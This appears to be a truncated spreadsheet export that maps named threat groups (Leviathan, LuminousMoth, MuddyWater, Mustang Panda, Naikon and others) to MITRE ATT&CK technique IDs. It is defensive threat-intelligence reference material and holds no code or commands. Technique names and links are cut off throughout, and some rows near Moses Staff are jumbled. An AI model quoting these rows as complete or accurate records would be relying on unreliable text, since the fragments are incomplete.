G0065 Leviathan intrusion- group uses T1572 Protocol T attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1547.001Registry Ruattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1218.010Regsvr32 attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1074.002Remote Datattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1021.001Remote Des attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1021.004SSH attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1547.009Shortcut Mattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1586.001Social Medattack-pat technique [Leviathan
G0065 Leviathan intrusion- group uses T1585.001Social Medattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1566.001Spearphishattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1566.002Spearphishattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1027.003Steganogr attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1078 Valid Acco attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1059.005Visual Basiattack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1505.003Web Shell attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1047 Windows M attack-pat technique [Leviathan]
G0065 Leviathan intrusion- group uses T1546.003Windows Ma attack-pat technique [Leviathan]
G1014 LuminousMintrusion- group uses T1557.002ARP Cache attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1560 Archive Coattack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1553.002Code Signi attack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1574.002DLL Side-L attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1030 Data Transfattack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1005 Data from attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1588.004Digital Certattack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1608.004Drive-by T attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1041 Exfiltratio attack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1567.002Exfiltratio attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1083 File and Di attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1564.001Hidden Fileattack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1105 Ingress Tooattack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1608.005Link Targetattack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1204.001Malicious Lattack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1587.001Malware attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1588.001Malware attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1036.005Match Legiattack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1112 Modify Regattack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1547.001Registry Ruattack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1091 Replicatio attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1053.005Scheduled attack-pat technique [LuminousMo
G1014 LuminousMintrusion- group uses T1566.002Spearphishattack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1539 Steal Web attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1033 System Own attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1588.002Tool attack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1608.001Upload Maattack-pat technique [LuminousM
G1014 LuminousMintrusion- group uses T1071.001Web Protocattack-pat technique [LuminousM
G0095 Machete intrusion- group uses T1189 Drive-by C attack-pat technique [Machete](h
G0095 Machete intrusion- group uses T1204.002Malicious Fattack-pat technique [Machete](
G0095 Machete intrusion- group uses T1204.001Malicious Lattack-pat technique [Machete](h
G0095 Machete intrusion- group uses T1036.005Match Legiattack-pat technique [Machete](
G0095 Machete intrusion- group uses T1218.007Msiexec attack-pat technique [Machete](
G0095 Machete intrusion- group uses T1059.006Python attack-pat technique [Machete](
G0095 Machete intrusion- group uses T1053.005Scheduled attack-pat technique [Machete](
G0095 Machete intrusion- group uses T1566.001Spearphishattack-pat technique [Machete](
G0095 Machete intrusion- group uses T1566.002Spearphishattack-pat technique [Machete](h
G0095 Machete intrusion- group uses T1059.005Visual Basiattack-pat technique [Machete](
G0095 Machete intrusion- group uses T1059.003Windows Cattack-pat technique [Machete](h
G0059 Magic Houintrusion- group uses T1098.002Additional attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1098.007Additional attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1071 Applicationattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1560.001Archive viaattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1102.002Bidirectio attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1070.003Clear Comm attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1027.010Command aOttack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1589.001Credentialsattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1486 Data Encryattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1005 Data from attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1078.001Default Ac attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1591.001Determine attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1562.002Disable Wiattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1562.004Disable or attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1562.001Disable or attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1078.002Domain Acattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1482 Domain Truattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1583.001Domains attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1584.001Domains attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1189 Drive-by C attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1087.003Email Accoattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1586.002Email Accoattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1585.002Email Accoattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1589.002Email Addrattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1114 Email Colleattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1573 Encrypted attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1027.013Encrypted/attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1567 Exfiltratio attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1190 Exploit Pubattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1070.004File Deleti attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1083 File and Di attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1589 Gather Victattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1564.003Hidden Wi attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1590.005IP Address attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1562 Impair Defattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1105 Ingress Tooattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1016.001Internet C attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1056.001Keyloggingattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1003.001LSASS Memattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1570 Lateral Tooattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1136.001Local Acco attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1114.001Local Emailattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1204.002Malicious Fattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1204.001Malicious Lattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1036.010Masqueradattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1036.004Masquerade attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1036.005Match Legiattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1112 Modify Regattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1046 Network Seattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1571 Non-Standaattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1059.001PowerShellattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1057 Process Di attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1572 Protocol T attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1090 Proxy attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1547.001Registry Ruattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1021.001Remote Des attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1114.002Remote Ema attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1018 Remote Sysattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1218.011Rundll32 attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1053.005Scheduled attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1113 Screen Capattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1585.001Social Medattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1592.002Software attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1566.002Spearphishattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1598.003Spearphishattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1566.003Spearphishiattack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1082 System Inf attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1016 System Netattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1049 System Netattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1033 System Own attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1588.002Tool attack-pat technique [Magic Houn
G0059 Magic Houintrusion- group uses T1059.005Visual Basiattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1595.002Vulnerabiliattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1071.001Web Protocattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1583.006Web Servicattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1505.003Web Shell attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1016.002Wi-Fi Disc attack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1059.003Windows Cattack-pat technique [Magic Hou
G0059 Magic Houintrusion- group uses T1047 Windows M attack-pat technique [Magic Hou
G1026 Malteiro intrusion- group uses T1555 Credential attack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1555.003Credential attack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1140 Deobfuscatattack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1055.001Dynamic-linattack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1027.013Encrypted/attack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1657 Financial Tattack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1204.002Malicious Fattack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1518.001Security S attack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1566.001Spearphishattack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1082 System Inf attack-pat technique [Malteiro]
G1026 Malteiro intrusion- group uses T1614.001System Lanattack-pat technique [Malteiro](
G1026 Malteiro intrusion- group uses T1059.005Visual Basiattack-pat technique [Malteiro](
G1013 Metador intrusion- group uses T1027.013Encrypted/attack-pat technique [Metador](
G1013 Metador intrusion- group uses T1070.004File Deleti attack-pat technique [Metador](
G1013 Metador intrusion- group uses T1105 Ingress Tooattack-pat technique [Metador](
G1013 Metador intrusion- group uses T1588.001Malware attack-pat technique [Metador](
G1013 Metador intrusion- group uses T1095 Non-Applicattack-pat technique [Metador](
G1013 Metador intrusion- group uses T1588.002Tool attack-pat technique [Metador](
G1013 Metador intrusion- group uses T1071.001Web Protocattack-pat technique [Metador](
G1013 Metador intrusion- group uses T1059.003Windows Cattack-pat technique [Metador](
G1013 Metador intrusion- group uses T1546.003Windows Ma attack-pat technique [Metador](h
G0002 Moafee intrusion- group uses T1027.001Binary Padattack-pat technique [Moafee](h
G0103 Mofang intrusion- group uses T1027.013Encrypted/attack-pat technique [Mofang](h
G0103 Mofang intrusion- group uses T1204.002Malicious Fattack-pat technique [Mofang](ht
G0103 Mofang intrusion- group uses T1204.001Malicious Lattack-pat technique [Mofang](ht
G0103 Mofang intrusion- group uses T1566.001Spearphishattack-pat technique [Mofang](ht
G0103 Mofang intrusion- group uses T1566.002Spearphishattack-pat technique [Mofang](ht
G0021 Molerats intrusion- group uses T1553.002Code Signi attack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1555.003Credential attack-pat technique [Molerats]
G0021 Molerats intrusion- group uses T1140 Deobfuscatattack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1027.013Encrypted/attack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1105 Ingress Tooattack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1059.007JavaScript attack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1204.002Malicious Fattack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1204.001Malicious Lattack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1218.007Msiexec attack-pat technique [Molerats]
G0021 Molerats intrusion- group uses T1059.001PowerShellattack-pat technique [Molerats]
G0021 Molerats intrusion- group uses T1057 Process Di attack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1547.001Registry Ruattack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1053.005Scheduled attack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1566.001Spearphishattack-pat technique [Molerats]
G0021 Molerats intrusion- group uses T1566.002Spearphishattack-pat technique [Molerats](
G0021 Molerats intrusion- group uses T1059.005Visual Basiattack-pat technique [Molerats](
G1036 Moonstoneintrusion- group uses T1217 Browser Inattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1195.002Compromise attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1486 Data Encryattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1140 Deobfuscatattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1587 Develop Cap attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1583.001Domains attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1585.002Email Accoattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1589.002Email Addrattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1027.009Embeddedattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1027.013Encrypted/attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1591 Gather Vic attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1105 Ingress Tooattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1003.001LSASS Memattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1204.002Malicious Fattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1587.001Malware attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1027 Obfuscatedattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1598 Phishing foattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1547.001Registry Ruattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1053.005Scheduled attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1569.002Service Ex attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1585.001Social Medattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1566.001Spearphishattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1598.003Spearphishattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1566.003Spearphishiattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1082 System Inf attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1016 System Netattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1033 System Own attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1608.001Upload Maattack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1583.003Virtual Pri attack-pat technique [Moonstone
G1036 Moonstoneintrusion- group uses T1071.001Web Protocattack-pat technique [Moonstone
G1009 Moses Stafintrusion- group uses T1553.002Code Signi attack-pat technique [Moses Staf
G1009 Moses Stafintrusion- group uses T1562.004Disable or attack-pat technique [Moses Staf
G1009 Moses Stafintrusion- group uses T1027.013Encrypted/attack-pat technique [Moses Staf
G1009 Moses Stafintrusion- group uses T1190 Exploit Pubattack-pat technique [Moses Staf
G1009 Moses Stafintrusion- group uses T1105 Ingress Tooattack-pat technique [Moses Sta
G1009 Moses Stafintrusion- group uses T1087.001Local Acco attack-pat technique [Moses Sta
G1009 Moses Stafintrusion- group uses T1587.001Malware attack-pat technique [Moses Staf
G1009 Moses Stafintrusion- group uses T1021.002SMB/Windo attack-pat technique [Moses
[Moses Sta
Staff](https://attack.m
G1009 Moses Stafintrusion- group uses T1082 System Inf attack-pat technique
G1009 Moses Stafintrusion- group uses T1016 System Netattack-pat technique [Moses Sta
G1009 Moses Stafintrusion- group uses T1588.002Tool attack-pat technique [Moses Sta
G1009 Moses Stafintrusion- group uses T1505.003Web Shell attack-pat technique [Moses Sta
G1019 Moustacheintrusion- group uses T1659 Content Injattack-pat technique [Moustache
G1019 Moustacheintrusion- group uses T1068 Exploitatioattack-pat technique [Moustache
G1019 Moustacheintrusion- group uses T1059.007JavaScript attack-pat technique [Moustache
G1019 Moustacheintrusion- group uses T1059.001PowerShellattack-pat technique [Moustache
G1019 Moustacheintrusion- group uses T1090 Proxy attack-pat technique [Moustache
G1019 Moustacheintrusion- group uses T1074.002Remote Datattack-pat technique [Moustache
G1019 Moustacheintrusion- group uses T1113 Screen Capattack-pat technique [Moustache
G1019 Moustacheintrusion- group uses T1027.002Software Pattack-pat technique [Moustache
G0069 MuddyWatintrusion- group uses T1560.001Archive viaattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1102.002Bidirectio attack-pat technique [MuddyWater
G0069 MuddyWatintrusion- group uses T1548.002Bypass Useattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1218.003CMSTP attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1003.005Cached Dom attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1027.010Command aOttack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1027.004Compile Aftattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1559.001Componentattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1552.001Credentialsattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1555 Credential attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1555.003Credential attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1574.002DLL Side-L attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1140 Deobfuscatattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1562.001Disable or attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1087.002Domain Acattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1559.002Dynamic Daattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1041 Exfiltratio attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1190 Exploit Pubattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1203 Exploitatioattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1210 Exploitatioattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1090.002External Prattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1083 File and Di attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1105 Ingress Tooattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1059.007JavaScript attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1003.004LSA Secret attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1003.001LSASS Memattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1074.001Local Data attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1204.002Malicious Fattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1204.001Malicious Lattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1036.005Match Legiattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1218.005Mshta attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1104 Multi-Stag attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1137.001Office Temattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1059.001PowerShellattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1057 Process Di attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1059.006Python attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1547.001Registry Ruattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1219 Remote Accattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1218.011Rundll32 attack-pat technique [MuddyWater
G0069 MuddyWatintrusion- group uses T1053.005Scheduled attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1113 Screen Capattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1518.001Security S attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1518 Software Dattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1566.001Spearphishattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1566.002Spearphishattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1132.001Standard Eattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1027.003Steganogr attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1573.001Symmetric attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1082 System Inf attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1016 System Netattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1049 System Netattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1033 System Own attack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1588.002Tool attack-pat technique MuddyWater
G0069 MuddyWatintrusion- group uses T1059.005Visual Basiattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1071.001Web Protocattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1583.006Web Servicattack-pat technique [MuddyWater
G0069 MuddyWatintrusion- group uses T1059.003Windows Cattack-pat technique [MuddyWate
G0069 MuddyWatintrusion- group uses T1047 Windows M attack-pat technique [MuddyWate
G0129 Mustang Pintrusion- group uses T1560.003Archive vi attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1560.001Archive viaattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1119 Automatedattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1027.001Binary Padattack-pat technique [Mustang Pa
G0129 Mustang Pintrusion- group uses T1574.002DLL Side-L attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1583.001Domains attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1036.007Double Fileattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1585.002Email Accoattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1052.001Exfiltratio attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1203 Exploitatioattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1070.004File Deleti attack-pat technique [Mustang Pa
G0129 Mustang Pintrusion- group uses T1083 File and Di attack-pat technique [Mustang Pa
G0129 Mustang Pintrusion- group uses T1564.001Hidden Fileattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1105 Ingress Tooattack-pat technique [Mustang Pa
G0129 Mustang Pintrusion- group uses T1218.004InstallUtil attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1074.001Local Data attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1204.002Malicious Fattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1204.001Malicious Lattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1036.005Match Legiattack-pat technique [Mustang Pa
G0129 Mustang Pintrusion- group uses T1218.005Mshta attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1003.003NTDS attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1027 Obfuscatedattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1059.001PowerShellattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1057 Process Di attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1547.001Registry Ruattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1219 Remote Accattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1091 Replicatio attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1053.005Scheduled attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1518 Software Dattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1566.001Spearphishattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1566.002Spearphishattack-pat technique [Mustang Pa
G0129 Mustang Pintrusion- group uses T1598.003Spearphishattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1608 Stage Capab attack-pat technique [Mustang Pa
G0129 Mustang Pintrusion- group uses T1573.001Symmetric attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1082 System Inf attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1016 System Netattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1049 System Netattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1608.001Upload Maattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1059.005Visual Basiattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1071.001Web Protocattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1102 Web Servicattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1059.003Windows Cattack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1047 Windows M attack-pat technique [Mustang P
G0129 Mustang Pintrusion- group uses T1546.003Windows Ma attack-pat technique [Mustang P
G1020 Mustard T intrusion- group uses T1584.001Domains attack-pat technique [Mustard Te
G1020 Mustard T intrusion- group uses T1189 Drive-by C attack-pat technique [Mustard Te
G1020 Mustard T intrusion- group uses T1608.004Drive-by T attack-pat technique [Mustard Te
G1020 Mustard T intrusion- group uses T1105 Ingress Tooattack-pat technique [Mustard T
G1020 Mustard T intrusion- group uses T1204.001Malicious Lattack-pat technique [Mustard T
G1020 Mustard T intrusion- group uses T1583.008Malvertisi attack-pat technique [Mustard T
G1020 Mustard T intrusion- group uses T1036.005Match Legiattack-pat technique [Mustard Te
G1020 Mustard T intrusion- group uses T1608.006SEO Poisonattack-pat technique [Mustard Te
G1020 Mustard T intrusion- group uses T1583.004Server attack-pat technique [Mustard Te
G1020 Mustard T intrusion- group uses T1566.002Spearphishattack-pat technique [Mustard T
G1020 Mustard T intrusion- group uses T1082 System Inf attack-pat technique [Mustard T
G1020 Mustard T intrusion- group uses T1608.001Upload Maattack-pat technique [Mustard T
G0019 Naikon intrusion- group uses T1137.006Add-ins attack-pat technique [Naikon](ht
G0019 Naikon intrusion- group uses T1574.002DLL Side-L attack-pat technique [Naikon](ht
G0019 Naikon intrusion- group uses T1078.002Domain Acattack-pat technique [Naikon](h
G0019 Naikon intrusion- group uses T1204.002Malicious Fattack-pat technique [Naikon](h
G0019 Naikon intrusion- group uses T1036.004Masquerade attack-pat technique [Naikon](h
G0019 Naikon intrusion- group uses T1036.005Match Legiattack-pat technique [Naikon](h
G0019 Naikon intrusion- group uses T1046 Network Seattack-pat technique [Naikon](ht
G0019 Naikon intrusion- group uses T1547.001Registry Ruattack-pat technique [Naikon](ht
G0019 Naikon intrusion- group uses T1018 Remote Sysattack-pat technique [Naikon](ht
G0019 Naikon intrusion- group uses T1053.005Scheduled attack-pat technique [Naikon](h
G0019 Naikon intrusion- group uses T1518.001Security S attack-pat technique [Naikon](ht
G0019 Naikon intrusion- group uses T1566.001Spearphishattack-pat technique [Naikon](h
G0019 Naikon intrusion- group uses T1016 System Netattack-pat technique [Naikon](h
G0019 Naikon intrusion- group uses T1047 Windows M attack-pat technique [Naikon](h
G0133 Nomadic Ointrusion- group uses T1564.003Hidden Wi attack-pat technique [Nomadic O
G0133 Nomadic Ointrusion- group uses T1105 Ingress Tooattack-pat technique [Nomadic O
G0133 Nomadic Ointrusion- group uses T1204.002Malicious Fattack-pat technique [Nomadic Oc
G0133 Nomadic Ointrusion- group uses T1036 Masqueradattack-pat technique [Nomadic O
